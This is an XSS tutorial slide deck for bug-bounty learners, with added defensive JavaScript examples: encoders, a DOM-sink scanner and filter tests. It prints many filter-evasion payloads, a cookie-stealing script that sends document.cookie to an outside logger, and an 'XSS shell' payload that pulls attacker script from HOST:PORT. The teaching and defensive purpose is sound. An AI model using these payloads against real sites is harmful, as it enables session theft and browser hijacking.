XSS Primer: Noob to Pro in 1 hour
By @snoopy_security
Who and Why
• Student & Junior Security Consultant.
• XSS is an easy win if you do it correctly.
• Bug bounties pay well and clients give you respect.
• Cross-site scripting is one of the oldest known web application attacks, dating back to around 1996-1998.
What is XSS?
• Untrusted data from the user is processed by the application without validation or output encoding and ends up in a page that the browser renders.
• The impact is on the client (the victim's browser), but the flaw lives in the application's code: server-side for reflected and stored XSS, in the page's own JavaScript for DOM XSS.
• Different types: Reflected, Stored and DOM XSS.
Reflected XSS

<?php
echo '<h1>Hello ' . $_GET["name"] . '</h1>';

What is wrong with the above code?
• It just prints the name retrieved from the $_GET variable, with no validation and no HTML encoding.
• An attacker can add malicious JavaScript to the original URL (e.g. ?name=<script>alert(1)</script>) and it is rendered as part of the page for whoever opens that link.
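The same handler in Node.js beside its fixed version, as an added example that is not part of the original deck: the page template, the crafted query value and the escapeHtml helper are assumptions made for the demo.

```javascript
// Added example, not from the original deck: the PHP handler above
// rewritten in Node.js beside its fixed version. The template string and
// the attacker-supplied "name" value are assumptions for the demo.

// Vulnerable: the untrusted query parameter is concatenated into the body.
function renderVulnerable(name) {
  return '<h1>Hello ' + name + '</h1>';
}

// Fix for the HTML body context: entity-encode the characters that can
// open a tag or an attribute. (Attribute, script, URL and style contexts
// each need their own encoder; this one is not enough there.)
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(name) {
  return '<h1>Hello ' + escapeHtml(name) + '</h1>';
}

// The crafted link, as the attacker would send it (constructed):
//   /hello?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E
// Node's URLSearchParams does the same decoding PHP does for $_GET.
const attackerName = new URLSearchParams('name=%3Cscript%3Ealert(1)%3C%2Fscript%3E').get('name');

console.log('vulnerable:', renderVulnerable(attackerName));
console.log('fixed:     ', renderSafe(attackerName));
```

The vulnerable output contains a live `<script>` element; the fixed output contains the same characters as text, which the browser displays rather than executes.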
Some Beginner Tips
• XSS can come from anywhere. Some common sources are:
• URL parameters
• Headers, e.g. User-Agent
• Metadata
• Input forms
• Text areas
• Hidden fields
• Flash parameters
• File uploads
Some Beginner Tips
1. Try injecting plain HTML tags as well as malicious JavaScript; a reflected <b> or <h1> tells you markup survives before you spend time on script.
2. SVG is always good for a short and crisp attack vector. You can use whitespace, forward slashes instead of spaces and unclosed tags.
3. Add junk data in front of your payload.
4. Always try a couple of different payloads. This mainly applies when trying to evade filters.

"><svg/onload=prompt(1)>
Stored XSS
• The malicious payload is stored by the server (in a database or other storage) and is served back to every user who views the affected page.
• Easier to exploit than reflected XSS: there is no need to phish the victim into clicking a crafted link.
• Can yield admin session cookies and, depending on the attack vector, access to the internal network (the payload runs inside the victim's browser, which may sit inside that network).
DOM XSS
• The Document Object Model is the structured, in-memory representation of the web page as the browser has rendered it.
• The DOM is where event handlers and other JavaScript act on the page; it reflects all of the HTML and JavaScript the browser has processed, including changes made after load.
• The DOM defines the way a web page is accessed and manipulated from script.
• An attacker who controls data that page JavaScript writes into the DOM can inject elements and handlers that run in the victim's browser, without the payload ever reaching the server.
DOM XSS
• To find DOM XSS, analyse the JavaScript executed on the page and see whether attacker-controlled data (a source) is written into the DOM (a sink).
• The DOM is not "view source". Inspect element shows the live DOM after scripts have run and is a better visual representation of it.
• ZAP, Burp and other proxies do pick up unsafe methods, but you will still need to check manually.
• If a finding cannot be exploited directly, work out which library and which unsafe sink the application is using, e.g. jQuery's .attr() when it sets href or an event handler attribute.
DOM XSS
• Common sources (places where untrusted data enters the page):
• document.location
• document.URL
• document.URLUnencoded (legacy IE only)
• document.referrer
• window.location
• The data can then reach sinks such as eval, document.write, innerHTML and window.setInterval / setTimeout when they are passed a string.
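The manual review described on the two slides above, reduced to a script, as an added example that is not part of the original deck: a small source-to-sink scanner over page JavaScript. The source and sink lists, the taint rule and the sample script are all assumptions made for the demo.

```javascript
// Added example, not from the original deck: a small source-to-sink
// scanner for client-side JavaScript. It taints variables assigned from
// a DOM XSS source and reports lines where a source, or a tainted
// variable, reaches a sink. Lists and sample script are constructed.

const SOURCES = [
  'document.location', 'document.URL', 'document.URLUnencoded',
  'document.referrer', 'window.location', 'location.hash',
  'location.search', 'window.name',
];

const SINKS = [
  'eval(', 'new Function(', 'document.write(', 'document.writeln(',
  'setInterval(', 'setTimeout(', '.innerHTML', '.outerHTML',
  'insertAdjacentHTML(', '.html(', '.attr(',
];

// "var x = <expr>" / "x = <expr>" at the start of a line.
const ASSIGN = /^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=\s*(.+)$/;

function findDomXssCandidates(src) {
  const tainted = new Set();      // variables assigned from a source
  const findings = [];
  src.split('\n').forEach((line, i) => {
    const m = ASSIGN.exec(line);
    if (m && SOURCES.some((s) => m[2].includes(s))) tainted.add(m[1]);
    for (const sink of SINKS) {
      if (!line.includes(sink)) continue;
      const direct = SOURCES.find((s) => line.includes(s));
      const viaVar = [...tainted].find((v) =>
        new RegExp('\\b' + v.replace(/\$/g, '\\$') + '\\b').test(line));
      if (direct || viaVar) {
        findings.push({ line: i + 1, sink, source: direct || viaVar, text: line.trim() });
      }
    }
  });
  return findings;
}

// Constructed sample page script: the assignment on line 2 feeds
// innerHTML on line 3, document.referrer reaches document.write on
// line 4, and lines 5-6 only move static data and must not be reported.
const SAMPLE = `
var page = location.hash.slice(1);
document.getElementById('content').innerHTML = page;
document.write("<p>You came from " + document.referrer + "</p>");
var title = 'static';
document.title = title;
`;

for (const f of findDomXssCandidates(SAMPLE)) {
  console.log(`line ${f.line}: ${f.source} -> ${f.sink}   ${f.text}`);
}
```

This is a line-oriented approximation, not a real taint analysis: it misses data that flows through function calls or object properties, which is exactly why the slide says the proxy findings still need a manual check.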
Useful sources
• OWASP DOM based XSS Prevention Cheat Sheet: a good explanation of the unsafe methods that directly modify the DOM.
• The DOM XSS wiki: https://code.google.com/p/domxsswiki/wiki/Introduction has useful information on dangerous methods and on common sources and sinks.
• Other variations include Mutation XSS. More on that later.
Context is Everything
Context is where the given input is reflected back. Five common ones:
1. HTML
2. Attribute
3. Script
4. URL
5. Style
HTML Context
• Malicious input is reflected back in the HTML body, inside tags such as <div>, <p>, <title> and so on.
• Easiest to attack.
• Close the enclosing tag and try <script>alert(1)</script> or any similar payload. Inside <title> and <textarea> the parser treats content as raw text, so you must close that tag first.
Attribute Context
• HTML elements can have attributes.
• Input is reflected inside an attribute value, so look for input being reflected back in value="..." or alt="..." or something similar.
• Most of the time the attribute value will be inside single or double quotes.
Couple of tips
1. Break out of the context by closing the quote and then the tag, e.g. '> or ">.
2. No amount of encoding will help your payload if you cannot break out of the context; the quote character itself has to survive.
3. If in doubt, URL-encode any characters that have meaning in the query string: & = + ; and space.
4. Event handlers can also be used to attack attributes without leaving the tag, e.g. aas' onload='prompt(0);''
Script Context
• The input is reflected inside a <script> block, usually as part of a string assigned to a variable.
• Break out of the string with a matching quote, add your own statement and comment out the rest of the line.
• Payload example: junk' ; alert(1);//
• </script> also works here: the HTML parser closes the script block before the JavaScript parser ever sees the string, so you can start a fresh <script> tag.
URL Context
• The input is reflected inside a URL-bearing attribute, e.g.

<iframe src="[Reflected Data]">
<a href="[Reflected Data]">Link</a>
<META http-equiv="refresh" content="[Reflected Data]">

• No need to break out of the context; you only need a URL whose scheme executes code (and to encode the payload). An <a href> requires the victim to click the link; an <iframe src> or meta refresh fires on page load.
Tips
Common ways to attack the URL context:

javascript:prompt(0)
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

• The second payload is base64 encoded (it decodes to <script>alert(1)</script>). More about encoding later.
• You can also define the charset inside the data: URL, e.g. data:text/html;charset=utf-8;base64,... which may be useful in some cases.
• Caveat: current browsers (Chrome 60+, Firefox 59+) block top-level navigation to data: URLs, so the data: payload is mostly useful inside an iframe or against older browsers.
CSS Context
• Also known as style context.
• Input is usually reflected inside a <style> tag or a style attribute.
• Can be attacked using browser-specific CSS features that evaluate script. Another common one, which only works in old Internet Explorer (CSS expressions were removed from IE8 standards mode onwards):

width:expression(alert('XSS'))
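The five contexts above, seen from the defender's side, as an added example that is not part of the original deck: one output encoder per context, run against the deck's own break-out payloads. The page templates, function names and the CSS allow-list are assumptions made for the demo and belong to no library.

```javascript
// Added example, not from the original deck: one output encoder per
// context from the slides above, run against the deck's own break-out
// payloads. Templates and function names are assumptions for the demo.

// 1. HTML body: <div>HERE</div>. Encode the five characters that can
//    open a tag, an attribute or an entity.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// 2. Quoted attribute: value="HERE" or value='HERE'. Hex-entity every
//    non-alphanumeric so neither quote style can be closed.
function encodeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '&#x' + c.charCodeAt(0).toString(16) + ';');
}

// 3. Script string: var x = 'HERE'. \xHH / \uHHHH escapes neutralise
//    quotes, newlines and the "</script>" HTML-parser break-out.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? '\\x' + code.toString(16).padStart(2, '0')
                        : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// 4. URL: <a href="HERE">. Encoding cannot help: "javascript:prompt(0)"
//    is a perfectly well-formed attribute value. Validate the scheme,
//    then attribute-encode whatever is left.
function safeUrl(s) {
  const u = String(s).trim();
  return /^https?:\/\//i.test(u) ? encodeAttr(u) : 'about:blank';
}

// 5. Style: width:HERE. Allow-list a plain length, reject everything else.
function safeCssLength(s) {
  return /^\d{1,4}(px|%|em)$/.test(s) ? s : '0';
}

// The deck's payloads, one per context (the CSS one minus the "width:"
// that the template supplies).
const PAYLOADS = {
  html: '"><svg/onload=prompt(1)>',
  attr: "aas' onload='prompt(0);'",
  js:   "junk' ; alert(1);//",
  url:  'javascript:prompt(0)',
  css:  "expression(alert('XSS'))",
};

function renderAll(p) {
  return {
    html: '<div>' + encodeHtml(p.html) + '</div>',
    attr: "<input value='" + encodeAttr(p.attr) + "'>",
    js:   "<script>var name = '" + encodeJsString(p.js) + "';</script>",
    url:  '<a href="' + safeUrl(p.url) + '">link</a>',
    css:  '<div style="width:' + safeCssLength(p.css) + '">x</div>',
  };
}

console.log(renderAll(PAYLOADS));
```

The point of the URL and style branches is the one the slides make implicitly: in those two contexts the attacker never has to break out, so encoding alone does nothing and the value has to be validated against what the template expects.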
WAF Detection
• Usually regex-, blacklist- or whitelist-based.
• A WAF can sometimes inspect outbound responses as well as inbound requests.
• Most WAFs still detect using a signature-based approach.
• Common ways to spot a WAF: modified or added cookies, rewritten headers and unusual response codes for malicious-looking requests.
WAF Detection
• First find out which characters are allowed and which are blocked, then which combinations of them are. A probe such as the one below, sent one character at a time and then together, shows what the WAF reacts to:

xss,<>{};"'script

• Some known tools to detect WAFs:
• Wafw00f
• http-waf-fingerprint NSE script (nmap)
• http-waf-detect NSE script (nmap)
• They will only detect the popular ones.
Filter Evasion 101
• There is more than one way to skin a web app!
• If the <script> tag is blocked, try variations of it:

"><script >alert(document.cookie)</script >
"><ScRiPt>alert(document.cookie)</ScRiPt>
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%00"><script>alert(document.cookie)</script>

• The nested form works against filters that strip the string <script> in a single pass: removing the inner tag leaves a complete outer one.
• If the site is filtering double and single quotes, you can use the backtick (`). As an attribute delimiter this only works in IE; inside JavaScript, backtick template literals (alert(`1`)) work in every modern browser.
Filter Evasion
• Some popular techniques use spaces, encoding and comments. Try prompt or confirm instead of alert if the word alert is blocked.
• Load an external JavaScript file from a script src attribute if brackets and quotes are blocked; an unquoted URL needs neither.
• If the application is filtering quotes or blocking script tags, try the below:

<SCRIPT SRC=https://web.archive.org/web/20150121175718/http://ha.ckers.org/xss.js></SCRIPT>

<img/src=x onerror=prompt(/XSS/);>

• The second payload needs no quotes, no spaces and no script tag: the regex literal /XSS/ stands in for a quoted string.
Filter Evasion
• When in doubt, comment out everything after your payload:

<script>alert(1)</script><!-- (html/attribute context)
";alert(5);// (script context)

• If the less-than and greater-than signs are filtered in attribute context, stay inside the tag and add an event handler:

" onload="prompt(0);"

• If script and src are blocked in an HTML context, try:

<object data="javascript:alert(0)">
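The filter-evasion slides above assume a blacklist that strips or matches bad strings. As an added example that is not part of the original deck, here is a filter of that kind written for the demo (not any real product), the deck's bypasses run against it, and the fix: encode on output rather than strip on input.

```javascript
// Added example, not from the original deck: a blacklist filter of the
// kind the evasion payloads above are written for, the bypasses from the
// slides run against it, and the fix (encode on output rather than strip
// on input). The filter is constructed for the demo, not a real product.

// Naive filter 1: strips <script> and </script>, case-sensitive, one pass.
function naiveStrip(input) {
  return input.replace(/<\/?script>/g, '');
}

// Naive filter 2: same, but case-insensitive. Still one pass.
function naiveStripCI(input) {
  return input.replace(/<\/?script>/gi, '');
}

// The fix: never try to remove the bad parts, encode for the HTML body.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Bypasses from the slides above.
const BYPASSES = [
  { name: 'mixed case',  payload: '<ScRiPt>alert(document.cookie)</ScRiPt>' },
  { name: 'nested tag',  payload: '<scr<script>ipt>alert(document.cookie)</scr</script>ipt>' },
  { name: 'no <script>', payload: '<img/src=x onerror=prompt(/XSS/);>' },
];

// Crude oracle for "would the browser execute this": an executable tag,
// or any tag carrying an on* event handler.
function stillDangerous(html) {
  return /<\s*(script|svg|img)\b|<[^>]*\bon\w+\s*=/i.test(html);
}

function evaluate(filter) {
  return BYPASSES.map((b) => {
    const output = filter(b.payload);
    return { name: b.name, output, bypassed: stillDangerous(output) };
  });
}

for (const [label, filter] of [['strip', naiveStrip], ['strip (ci)', naiveStripCI], ['encode', encodeHtml]]) {
  console.log(label + ': ' + evaluate(filter)
    .map((r) => `${r.name}=${r.bypassed ? 'BYPASSED' : 'blocked'}`).join(', '));
}
```

Note what the single-pass filter turns the nested payload into: `<script>alert(document.cookie)</script>`, a cleaner payload than the one that went in. Making the filter case-insensitive fixes one row of the table and none of the others; encoding fixes all three because it never tries to decide what is dangerous.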
Filter Evasion resources
Too many techniques to present. Check them out here:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html
http://n0p.net/penguicon/php_app_sec/mirror/xss.html
Encoding
• Encoding: transforming data from one representation to another, e.g. ASCII, Unicode, URL encoding, HTML entities.
• Browsers support numerous encoding schemes, but which attack vector works depends on the page and the character set it declares (Content-Type header or <meta charset>).
• Encoding is only useful if something decodes it before the data reaches the sink: the server, or the browser's own parser. You still need to break out of the context correctly for the encoded payload to work.
• Example: inside an attribute value the HTML parser decodes numeric entities (even without the trailing semicolon), so alert&#40&#41 becomes alert() by the time the handler runs:

<svg/onload=alert&#40&#41>
Encoding
The following table describes how a user can obfuscate an IP address. This trick is getting more common among phishers, e.g.
http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/SignIn

URL                            Form
http://127.0.0.1/              Dotted decimal
http://2130706433/             Dword
http://0x7f.0x00.0x00.0x01/    Hex
http://0177.0000.0000.0001/    Octal
http://127.0x00.0000.0x01/     Mixed
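What a URL filter or phishing detector has to do with the table above, as an added example that is not part of the original deck: normalise every form back to dotted decimal using the rules a browser's URL parser applies. The helper names and the test URLs are constructed for the demo.

```javascript
// Added example, not from the original deck: normalise the obfuscated
// IPv4 host forms from the table above to dotted decimal, following the
// same rules a browser's URL parser applies (0x = hex, leading 0 = octal,
// fewer than four parts = the last part fills the remaining bytes). A
// filter that compares hosts as strings misses every one of these.

function parseIpv4Part(part) {
  let m;
  if ((m = /^0[xX]([0-9a-fA-F]*)$/.exec(part))) return m[1] === '' ? 0 : parseInt(m[1], 16);
  if ((m = /^0([0-7]+)$/.exec(part))) return parseInt(m[1], 8);
  if (/^[0-9]+$/.test(part)) return parseInt(part, 10);
  return NaN;                      // not a number: a normal hostname label
}

// Returns "a.b.c.d", or null when host is not an IPv4 literal.
function normaliseIpv4(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some(Number.isNaN)) return null;
  const last = nums[nums.length - 1];
  const head = nums.slice(0, -1);
  if (head.some((n) => n > 255)) return null;
  if (last >= Math.pow(256, 5 - nums.length)) return null;   // overflow
  let value = last;
  head.forEach((n, i) => { value += n * Math.pow(256, 3 - i); });
  return [24, 16, 8, 0]
    .map((shift) => Math.floor(value / Math.pow(2, shift)) % 256)
    .join('.');
}

// Take the host out of the URL with a plain regex on purpose: new URL()
// in Node and in browsers already performs this normalisation, which is
// exactly why the victim lands on the real address.
function rawHost(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^/?#:]+)/i.exec(url);
  return m ? m[1] : null;
}

// Constructed URLs: the five forms from the table plus the phishing example.
const URLS = [
  'http://127.0.0.1/', 'http://2130706433/', 'http://0x7f.0x00.0x00.0x01/',
  'http://0177.0000.0000.0001/', 'http://127.0x00.0000.0x01/',
  'http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/SignIn',
];

for (const u of URLS) console.log(u, '->', normaliseIpv4(rawHost(u)));
```

The first five URLs all normalise to 127.0.0.1; the phishing example resolves to 210.219.241.123, which is the value to run through blocklists and reputation lookups rather than the hex string the victim saw.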
Encoding
• String.fromCharCode() converts UTF-16 code units into characters, so the string "XSS" never appears literally in the payload.
• Zero-padded decimal HTML entities without semicolons, to bypass filters that only recognise the short form. The handler below decodes to javascript:alert('XSS'); inside an event handler the javascript: prefix is just a JavaScript label, so the alert still runs.

<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
Encoding
• Encoding can also be used to break up an XSS payload if the server is using pattern-matching regexes.
• Payloads can also be double encoded. Whether that works depends on how the application processes encoded client requests, e.g. a WAF that decodes once in front of an application that decodes again.
• The URL (percent) encoding of "../" is "%2E%2E%2F"; double encoding it gives "%252E%252E%252F".
• A tab entity inside the scheme, which the browser strips before parsing the URL (legacy browsers only; modern browsers do not run javascript: URLs from an <img> src at all):

<IMG SRC="jav&#x09;ascript:alert('XSS');">
More Filter Evasion
• ASCII decimal encoded. The payload uses HTML entities, which the HTML parser decodes before the browser acts on the value, so it turns into javascript:alert('XSS'):

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;

• ASCII hex encoded. Useful for bypassing PHP's magic_quotes_gpc, because the payload contains no literal quote characters:

&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;
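The decoding the three encoding slides above rely on, written out, as an added example that is not part of the original deck: numeric entity decoding the way the HTML parser does it for attribute values, followed by the URL parser's tab/newline stripping. A filter that searches attribute values for the literal string "javascript:" must perform both steps first. The inputs are the deck's own payloads; isJavascriptUrl is a helper written for the demo.

```javascript
// Added example, not from the original deck: decode the entity-encoded
// payloads above the way the HTML parser decodes an attribute value
// (decimal or hex numeric references, leading zeros allowed, trailing
// semicolon optional), then apply the URL parser's rule of discarding
// ASCII tab/newline before reading the scheme. Inputs are the deck's
// payloads; isJavascriptUrl is a helper written for the demo.

function decodeNumericEntities(s) {
  return s.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);?/g, (_, ref) => {
    const code = /^[xX]/.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10);
    return String.fromCodePoint(code);
  });
}

// Browsers strip leading C0 controls and spaces, remove tab, LF and CR
// anywhere in the URL, and match the scheme case-insensitively.
function isJavascriptUrl(value) {
  const cleaned = value.replace(/^[\x00-\x20]+/, '').replace(/[\t\n\r]/g, '');
  return /^javascript:/i.test(cleaned);
}

// The padded-decimal, hex and tab-split payloads from the slides above.
const DECIMAL_PADDED =
  '&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105' +
  '&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116' +
  '&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041';
const HEX =
  '&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;' +
  '&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;';
const TAB_SPLIT = "jav&#x09;ascript:alert('XSS');";

for (const p of [DECIMAL_PADDED, HEX, TAB_SPLIT]) {
  const decoded = decodeNumericEntities(p);
  console.log(JSON.stringify(decoded), '->', isJavascriptUrl(decoded));
}
```

Run on the raw, undecoded attribute value the check returns false for all three, which is the gap a filter that does not normalise first leaves open.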
Encoding
More examples here:
http://htmlpurifier.org/live/smoketests/xssAttacks.php
https://danielmiessler.com/study/encoding/
Some useful encoders:
http://n0p.net/penguicon/php_app_sec/mirror/xss.html
http://evuln.com/tools/xss-encoder/
https://mothereff.in/html-entities
http://dev.w3.org/html5/html-author/charref
https://hackvertor.co.uk/public
http://utf-8.jp/public/jjencode.html?src=
Actual attack vectors

<script>window.location="http://example.com/logger.php?cookie="+document.cookie;</script>

• When executed, the above code sends the victim's cookies to an attacker-controlled site. Cookies flagged HttpOnly are not visible to document.cookie, but a script running in the victim's session can still act on their behalf.
• XSS can be used for many things including cookie stealing, drive-by downloads, running browser exploits, phishing and more.
• BeEF (the Browser Exploitation Framework) makes everything easy.
• More cool XSS payloads: http://www.xss-payloads.com/
Useful tools
• Opinion: most scanners suck at finding XSS.
• A couple of tools I like: Xenotix, the XSSValidator Burp plugin, Sleepy Puppy (useful when testing multiple applications, as it has trackable XSS payloads).
How to build a scanner that works?
A - Scan from within a browser engine.
B - Use PhantomJS or a similar headless WebKit browser to detect a successful reflected XSS by observing execution rather than just reflection in the response.
I still prefer finding XSS manually but I like having options.
XSS Shell Demo
• Cool PoC by Brutelogic. A more fun way to report XSS than a bare alert(1).
• Attacker machine listener
• Target payload: on every tick, create a <script> element pointing at the attacker's host, so the listener can push fresh JavaScript into the victim's browser for as long as the page stays open.

<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
Things I didn't mention
• Flash XSS: embedded SWF files can be decompiled to source code, which can be used to find unfiltered variables that can be set from the URL to inject malicious JavaScript.
• XSS polyglot: upload a Flash file that is also accepted as valid JavaScript, then load it remotely via a script src. This can beat CSP in rare cases.
• Mutation XSS: there are more ways to trick the DOM into parsing apparently harmless, XHTML-like markup into a live payload.
All worth checking out.
@snoopy_security
IRC:#SHUHACKSOC
Website:http://shuhacksoc.co.uk
